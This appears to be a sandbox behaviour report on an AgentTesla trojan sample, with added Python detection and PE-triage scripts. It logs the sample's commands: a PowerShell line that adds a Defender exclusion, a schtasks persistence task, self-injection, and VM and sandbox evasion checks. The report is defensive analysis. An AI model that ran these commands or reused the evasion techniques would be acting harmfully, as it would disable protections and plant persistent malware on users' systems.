Source: Process Memory Space: wKQpOZ58Gl.exe PID: 3760, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 0_2_0092C454
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 0_2_0092EA70
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 0_2_0092EA61
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 14_2_027CF100
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 14_2_027CF448
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 14_2_027C61A2
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 14_2_027CADD0
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 14_2_05B4C940
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 14_2_05B4BBF0
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 14_2_05B41FF8
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 14_2_05B40040
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 14_2_05E881C5
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 14_2_05E8AC48
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 14_2_05E857B8
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 14_2_05E8E728
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 14_2_05E844F8
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 14_2_05E8CFB0
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 14_2_05E85754
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 14_2_05E83330
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: String function: 05B45A58 appears 53 times
Source: wKQpOZ58Gl.exe, 00000000.00000002.436014526.000000000074B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs wKQpOZ58Gl.exe
Source: wKQpOZ58Gl.exe, 00000000.00000002.468114283.000000000A9A0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSchedulingClerk.dll. vs wKQpOZ58Gl.exe
Source: wKQpOZ58Gl.exe, 00000000.00000002.437936842.0000000002441000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameFroor.dll4 vs wKQpOZ58Gl.exe
Source: wKQpOZ58Gl.exe, 00000000.00000002.442009787.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSchedulingClerk.dll. vs wKQpOZ58Gl.exe
Source: wKQpOZ58Gl.exe, 00000000.00000002.453033607.0000000005470000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamePlates.dll4 vs wKQpOZ58Gl.exe
Source: wKQpOZ58Gl.exe, 00000000.00000002.467471809.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameFroor.dll4 vs wKQpOZ58Gl.exe
Source: wKQpOZ58Gl.exe, 00000000.00000002.441112036.000000000272A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameZqMmxdBZxDWFkkqtZOXlpMZbKL.exe4 vs wKQpOZ58Gl.exe
Source: wKQpOZ58Gl.exe, 00000000.00000003.398824217.0000000006A2D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs wKQpOZ58Gl.exe
Source: wKQpOZ58Gl.exe, 00000000.00000000.358515181.0000000000012000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameConstructionRespo.exe@ vs wKQpOZ58Gl.exe
                Source: wKQpOZ58Gl.exe, 00000000.00000002.447462860.0000000004018000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZqMmxdBZxDWFkkqtZOXlpMZbKL.exe4 vs wKQpOZ58Gl.exe
                Source: wKQpOZ58Gl.exe, 0000000E.00000000.432521984.0000000000436000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZqMmxdBZxDWFkkqtZOXlpMZbKL.exe4 vs wKQpOZ58Gl.exe
                Source: wKQpOZ58Gl.exe, 0000000E.00000002.629086814.00000000008F9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs wKQpOZ58Gl.exe
                Source: wKQpOZ58Gl.exeBinary or memory string: OriginalFilenameConstructionRespo.exe@ vs wKQpOZ58Gl.exe
                Source: wKQpOZ58Gl.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: kqruryFrIFc.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: wKQpOZ58Gl.exe | Virustotal: Detection: 57%
                Source: wKQpOZ58Gl.exe | Metadefender: Detection: 25%
                Source: wKQpOZ58Gl.exe | ReversingLabs: Detection: 69%
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | File read: C:\Users\user\Desktop\wKQpOZ58Gl.exe
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknown | Process created: C:\Users\user\Desktop\wKQpOZ58Gl.exe "C:\Users\user\Desktop\wKQpOZ58Gl.exe"
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\kqruryFrIFc.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kqruryFrIFc" /XML "C:\Users\user\AppData\Local\Temp\tmp92BC.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Process created: C:\Users\user\Desktop\wKQpOZ58Gl.exe C:\Users\user\Desktop\wKQpOZ58Gl.exe
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Process created: C:\Users\user\Desktop\wKQpOZ58Gl.exe C:\Users\user\Desktop\wKQpOZ58Gl.exe
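The process chain above is a compact detection target: PowerShell adding a Defender exclusion for the dropped copy, schtasks registering a task from an XML file in the user's Temp directory, and the sample spawning a copy of itself before the injection reported elsewhere on this page. The following is an added example written for this page, not Joe Sandbox output and not code from the sample: it runs those three checks over constructed process-creation events modelled on the lines above. The event layout, the benign contrast event and the rule names are assumptions; treating a same-image child as an injection hint is deliberately kept weak, since browsers and updaters do the same thing.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event (Sysmon event 1 / Security 4688 style)."""
    parent_image: str
    image: str
    command_line: str


# Constructed sample events (not real telemetry) mirroring the chain in the report.
# "System32" in the command line but "SysWOW64" in the image path is ordinary WoW64
# file-system redirection for a 32-bit parent, not path spoofing.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Users\user\Desktop\wKQpOZ58Gl.exe",
              r'"C:\Users\user\Desktop\wKQpOZ58Gl.exe"'),
    ProcEvent(r"C:\Users\user\Desktop\wKQpOZ58Gl.exe",
              r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
              r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\kqruryFrIFc.exe"'),
    ProcEvent(r"C:\Users\user\Desktop\wKQpOZ58Gl.exe",
              r"C:\Windows\SysWOW64\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kqruryFrIFc" '
              r'/XML "C:\Users\user\AppData\Local\Temp\tmp92BC.tmp"'),
    ProcEvent(r"C:\Users\user\Desktop\wKQpOZ58Gl.exe",
              r"C:\Users\user\Desktop\wKQpOZ58Gl.exe",
              r"C:\Users\user\Desktop\wKQpOZ58Gl.exe"),
    # Benign contrast (assumed): an admin task defined with /TR rather than a temp XML file.
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /Create /TN "Backup\Nightly" /SC DAILY /TR "C:\Program Files\Backup\run.exe"'),
]

# Add-MpPreference with any -Exclusion* switch; Set-MpPreference takes the same switches.
_EXCLUSION = re.compile(r"\b(?:add|set)-mppreference\b.*?-exclusion(?:path|process|extension)\b", re.I)
# schtasks /Create ... /XML <file>, quoted or bare path.
_TASK_XML = re.compile(r"\bschtasks(?:\.exe)?\b.*?/create\b.*?/xml\s+(?:\"([^\"]+)\"|(\S+))", re.I)
_TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def is_defender_exclusion(ev: ProcEvent) -> bool:
    return ev.image.lower().endswith("powershell.exe") and bool(_EXCLUSION.search(ev.command_line))


def task_xml_from_temp(ev: ProcEvent):
    """Return the task-definition path when it lives in a temp directory, else None."""
    m = _TASK_XML.search(ev.command_line)
    if not m:
        return None
    path = m.group(1) or m.group(2)
    return path if any(d in path.lower() for d in _TEMP_DIRS) else None


def is_self_spawn(ev: ProcEvent) -> bool:
    """Parent and child share an image: a hollowing/injection precursor, but weak on its own."""
    return ev.parent_image.lower() == ev.image.lower()


def analyze(events):
    """Return (rule, detail) findings in event order."""
    findings = []
    for ev in events:
        if is_defender_exclusion(ev):
            findings.append(("defender_exclusion", ev.command_line))
        xml = task_xml_from_temp(ev)
        if xml:
            findings.append(("schtasks_xml_from_temp", xml))
        if is_self_spawn(ev):
            findings.append(("self_spawn", ev.image))
    return findings


if __name__ == "__main__":
    for rule, detail in analyze(SAMPLE_EVENTS):
        print(f"{rule}: {detail}")
```

The three rules fire on the second, third and fourth constructed events and stay silent on the benign task creation. In practice the first two are high-confidence on their own (a user-mode process excluding a file it just wrote to %APPDATA% from Defender has almost no legitimate reading), while the self-spawn rule is best used to raise the score of a parent that already tripped another rule.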
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor (issued 3 times)
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | File created: C:\Users\user\AppData\Roaming\kqruryFrIFc.exe
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | File created: C:\Users\user\AppData\Local\Temp\tmp92BC.tmp
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@11/9@2/2
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: wKQpOZ58Gl.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: wKQpOZ58Gl.exe, MaterialSurfaceExample/frmMain.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: kqruryFrIFc.exe.0.dr, MaterialSurfaceExample/frmMain.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 0.0.wKQpOZ58Gl.exe.10000.0.unpack, MaterialSurfaceExample/frmMain.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 14.0.wKQpOZ58Gl.exe.400000.0.unpack, A/F1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | File read: C:\Windows\System32\drivers\etc\hosts (read 3 times)
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: wKQpOZ58Gl.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: wKQpOZ58Gl.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: wKQpOZ58Gl.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                Data Obfuscation

                Source: wKQpOZ58Gl.exe, MaterialSurfaceExample/frmMain.cs | .Net Code: InnerException System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: kqruryFrIFc.exe.0.dr, MaterialSurfaceExample/frmMain.cs | .Net Code: InnerException System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: 0.0.wKQpOZ58Gl.exe.10000.0.unpack, MaterialSurfaceExample/frmMain.cs | .Net Code: InnerException System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 14_2_05E82177 push edi; retn 0000h
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 14_2_05E82520 push edi; ret
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 14_2_05E81432 pushfd ; iretd
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 14_2_05E80FFB push esp; iretd
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 14_2_05E80F9B push esp; iretd
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 14_2_05E81372 pushad ; iretd
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 14_2_05E81328 push esp; iretd
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 14_2_05E8125F pushfd ; iretd
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Code function: 14_2_05E81208 push esp; iretd
                Source: wKQpOZ58Gl.exe | Static PE information: 0xED6817C1 [Mon Mar 19 19:00:17 2096 UTC] (compile timestamp lies in the future; in a .NET assembly this is often the content hash that a deterministic Roslyn build writes into the field, with the high bit set, rather than a hand-forged date, so it should not be read as tampering on its own)
                Source: initial sample | Static PE information: section name: .text entropy: 7.704114614834008
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | File created: C:\Users\user\AppData\Roaming\kqruryFrIFc.exe
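The static PE facts this report lists for the sample (a .text section flagged CODE|EXECUTE|READ, the IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR directory that marks a .NET assembly, DllCharacteristics DYNAMIC_BASE/NX_COMPAT/NO_SEH/TERMINAL_SERVER_AWARE, a compile timestamp in 2096 and a .text entropy of 7.70) are cheap to reproduce in a triage script. The following is an added example, not part of the report and not Joe Sandbox tooling: it parses just enough of the PE headers to produce those indicators. Because the sample itself is not available here, the block builds a minimal PE32 fixture inline with the same section flags and DllCharacteristics; that fixture, the 7.0 entropy threshold and the deterministic-build reading of the timestamp are the editor's assumptions.

```python
import math
import struct
import time
from collections import Counter
from datetime import datetime, timedelta, timezone

OPT_FMT = "<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6   # PE32 optional header, 96 bytes
SECT_FMT = "<8sIIIIIIHHI"                                         # section header, 40 bytes
DLLCHAR_NAMES = {0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY", 0x0100: "NX_COMPAT",
                 0x0400: "NO_SEH", 0x8000: "TERMINAL_SERVER_AWARE"}
SCN_MEM_EXECUTE = 0x20000000
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: ~8.0 means encrypted/compressed, plain x86 code sits nearer 6."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def build_minimal_pe(text: bytes, timestamp: int, clr_header: bool) -> bytes:
    """Constructed fixture: one .text section (CODE|EXECUTE|READ) and the DllCharacteristics
    the report shows (DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE = 0x8540)."""
    file_align, hdr_size = 0x200, 0x200
    raw = (len(text) + file_align - 1) // file_align * file_align
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 224, 0x0102)
    dirs = [(0, 0)] * 16
    if clr_header:
        dirs[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR] = (0x2008, 72)  # CLR header inside .text
    opt = struct.pack(OPT_FMT, 0x10B, 48, 0, raw, 0, 0, 0x2000, 0x2000, 0x4000,
                      0x400000, 0x1000, file_align, 6, 0, 0, 0, 6, 0, 0,
                      0x3000, hdr_size, 0, 2, 0x8540, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    sect = struct.pack(SECT_FMT, b".text", len(text), 0x2000, raw, hdr_size, 0, 0, 0, 0, 0x60000020)
    headers = (dos + b"PE\0\0" + coff + opt + sect).ljust(hdr_size, b"\0")
    return headers + text.ljust(raw, b"\0")


def triage(pe: bytes) -> dict:
    """Parse the COFF/optional/section headers and emit the report's static indicators."""
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    machine, nsect, ts, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, e_lfanew + 4)
    opt = e_lfanew + 24
    magic, = struct.unpack_from("<H", pe, opt)
    dllchar, = struct.unpack_from("<H", pe, opt + 70)           # same offset in PE32 and PE32+
    pe32plus = magic == 0x20B
    nrva, = struct.unpack_from("<I", pe, opt + (108 if pe32plus else 92))
    dirs = opt + (112 if pe32plus else 96)
    clr_rva = 0
    if nrva > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR:
        clr_rva, _ = struct.unpack_from("<II", pe, dirs + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR)
    sections = []
    for i in range(nsect):
        name, _, _, rsize, rptr, *_, chars = struct.unpack_from(SECT_FMT, pe, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(),
                         "executable": bool(chars & SCN_MEM_EXECUTE),
                         "entropy": round(shannon_entropy(pe[rptr:rptr + rsize]), 3)})
    when = datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(seconds=ts)
    return {
        "machine": hex(machine),
        "is_dotnet": clr_rva != 0,            # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR populated
        "timestamp_utc": when.isoformat(),
        "timestamp_in_future": ts > int(time.time()),
        # Deterministic Roslyn builds store a content hash here with the high bit set, so a
        # future date in a .NET binary is not by itself evidence of a forged timestamp.
        "timestamp_looks_like_hash": bool(ts & 0x80000000),
        "dll_characteristics": [n for bit, n in DLLCHAR_NAMES.items() if dllchar & bit],
        "sections": sections,
        # The report's .text entropy of 7.70 lands here: executable section near 8 bits/byte.
        "packed_hint": any(s["executable"] and s["entropy"] > 7.0 for s in sections),
    }


if __name__ == "__main__":
    fixture = build_minimal_pe(bytes(range(256)) * 8, 0xED6817C1, clr_header=True)
    for key, value in triage(fixture).items():
        print(f"{key}: {value}")
```

For a real file, pass open(path, "rb").read() to triage(); the fixture builder exists only so the block runs offline. A high-entropy .text section in a .NET executable usually means an encrypted resource or embedded payload, which is consistent with the Assembly.Load(byte[]) and CreateDecryptor usage listed under Data Obfuscation, rather than a native packer.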

                Boot Survival

                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kqruryFrIFc" /XML "C:\Users\user\AppData\Local\Temp\tmp92BC.tmp"
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Process information set: NOOPENFILEERRORBOX (this line repeats 42 times; it records SetErrorMode(SEM_NOOPENFILEERRORBOX) calls, which the CLR and most hosts make routinely, so it is a weak indicator on its own)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (this line repeats 106 times)
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara matchFile source: 00000000.00000002.441112036.000000000272A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wKQpOZ58Gl.exe PID: 3676, type: MEMORYSTR
                Source: wKQpOZ58Gl.exe, 00000000.00000002.441112036.000000000272A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: wKQpOZ58Gl.exe, 00000000.00000002.441112036.000000000272A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe TID: 1320Thread sleep time: -45877s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6128Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe TID: 5116Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe TID: 5104Thread sleep count: 9582 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9076
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeWindow / User API: threadDelayed 9582
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeThread delayed: delay time: 45877
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeThread delayed: delay time: 922337203685477
                Source: wKQpOZ58Gl.exe, 00000000.00000003.408407706.0000000006A7B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
                Source: wKQpOZ58Gl.exe, 00000000.00000002.441112036.000000000272A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: wKQpOZ58Gl.exe, 00000000.00000002.441112036.000000000272A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                Source: wKQpOZ58Gl.exe, 00000000.00000002.441112036.000000000272A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                Source: wKQpOZ58Gl.exe, 00000000.00000002.441112036.000000000272A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeMemory written: C:\Users\user\Desktop\wKQpOZ58Gl.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\kqruryFrIFc.exe
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kqruryFrIFc" /XML "C:\Users\user\AppData\Local\Temp\tmp92BC.tmp
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess created: C:\Users\user\Desktop\wKQpOZ58Gl.exe C:\Users\user\Desktop\wKQpOZ58Gl.exe
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Users\user\Desktop\wKQpOZ58Gl.exe VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
